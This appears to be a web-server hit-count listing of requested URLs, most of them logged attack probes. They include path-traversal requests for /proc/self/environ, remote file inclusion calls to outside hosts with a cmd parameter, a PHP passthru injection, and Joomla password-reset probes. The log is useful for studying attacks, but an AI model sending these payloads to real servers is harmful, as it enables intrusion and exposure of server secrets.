/
6041
/index.php?option=com_user&view=reset&layout=confirm
2
/index.php?option=com_user&task=confirmreset
2
////?_SERVER[DOCUMENT_ROOT]=test??
3
////?_SERVER[DOCUMENT_ROOT]=http://pilek.info/img/allnet.jpg??
3
////?_SERVER[DOCUMENT_ROOT]=http://pilek.info/img/byroe.jpg??
3
http://quicktranslateapp.com
1
/?file=../../../../../../proc/self/environ%00
8
/?page=../../../../../../proc/self/environ%00
7
/?mod=../../../../../../proc/self/environ%00
7
/index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00
7
/?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}}
2
/?_CONFIG[files][functions_page]=http://62.141.58.186/google.txt
1
/?npage=-1&content_dir=http://62.141.58.186/google.txt%00&cmd=ls
1
/?npage=1&content_dir=http://62.141.58.186/google.txt%00&cmd=ls
1
/?show=http://62.141.58.186/google.txt?
1
/index.php/main.php?x=../../../../../../../proc/self/environ%00
1
/index.php?include=../../../../../../../proc/self/environ%00
1
/index.php?x=../../../../../../../proc/self/environ%00
1
/index.php?open=../../../../../../../proc/self/environ%00
1
/index.php?visualizar=../../../../../../../proc/self/environ%00
1
/index.php?pagina=../../../../../../../proc/self/environ%00
2
/index.php?inc=../../../../../../../proc/self/environ%00
1
/index.php?page=../../../../../../../proc/self/environ%00
1
/index.php?pg=../../../../../../../proc/self/environ%00
1
/index.php?show=../../../../../../../proc/self/environ%00
1
/index.php?cat=../../../../../../../proc/self/environ%00
2
/index.php?file=../../../../../../../proc/self/environ%00
1
/index.php?site=../../../../../../../proc/self/environ%00
1
/index.php?nic=../../../../../../../proc/self/environ%00
1
/index.php?sec=../../../../../../../proc/self/environ%00
1
/index.php?content=../../../../../../../proc/self/environ%00
1
/index.php?link=../../../../../../../proc/self/environ%00
1
/index.php?filename=../../../../../../../proc/self/environ%00
1
/index.php?dir=../../../../../../../proc/self/environ%00
1
/index.php?document=../../../../../../../proc/self/environ%00
1
/index.php?action=../../../../../../../proc/self/environ%00
1
/index.php?conteudo=../../../../../../../proc/self/environ%00
1
/index.php?meio.php=../../../../../../../proc/self/environ%00
1
/index.php?site_path=../../../../../../../proc/self/environ%00
1
/index.php?inc_dir=../../../../../../../proc/self/environ%00
1
/index.php?f=../../../../../../../proc/self/environ%00
1
/index.php?act=../../../../../../../proc/self/environ%00
1
/index.php?theme_path=../../../../../../../proc/self/environ%00
1
/index.php?template=../../../../../../../proc/self/environ%00
1
/index.php?req_path=../../../../../../../proc/self/environ%00
1
/index.php?archive=../../../../../../../proc/self/environ%00
1
/index.php?[Home]=../../../../../../../proc/self/environ%00
1
/index.php?custom=../../../../../../../proc/self/environ%00
1
//index.php
4
/?randomL=12
1
http://www.QUICKTRANSLATEAPP.COM/
1
http://QUICKTRANSLATEAPP.COM/
1